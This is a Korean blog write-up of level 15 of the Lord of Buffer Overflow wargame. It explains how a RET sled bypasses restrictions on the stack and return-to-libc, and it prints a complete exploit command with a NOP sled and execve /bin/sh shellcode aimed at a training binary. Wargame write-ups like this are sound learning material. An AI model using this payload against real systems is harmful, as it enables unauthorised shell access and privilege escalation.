ii4gsp
LOB - Level15 [giant -> assassin] 본문
stack을 사용할 수 없고 RTL도 사용불가능이다.
RET sled를 사용하여 문제를 풀어보자
gdb로 파일을 열고 ret부분에 break point를 걸고
RET에 RET를 한번더 넣고 NOP Sled와 쉘 코드를 넣어주자
RET에 RET를 넣어주고 0xbffffc0c를 RET로 잡고 페이로드를 작성해주자
buffer + sfp + &ret + 0xbffffc0c + NOP sled + 쉘 코드
[44byte] [4byte] [4byte] [100byte] [25byte]
payload
./assassin $(python -c 'print "\x90" * 44 + "\x1e\x85\x04\x08" + "\x0c\xfc\xff\xbf" + "\x90" * 100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"')'시스템 해킹 > LOB' 카테고리의 다른 글
| LOB - Level17 [zombie_assassin -> succubus] (0) | 2020.01.27 |
|---|---|
| LOB - Level16 [assassin -> zombie_assassin] (0) | 2020.01.26 |
| LOB - Level14 [bugbear -> giant] (0) | 2020.01.23 |
| LOB - Level13 [darkknight -> bugbear] (0) | 2020.01.21 |
| LOB - Level12 [golem -> darkknight] (0) | 2020.01.21 |
'시스템 해킹/LOB' Related Articles
more
Comments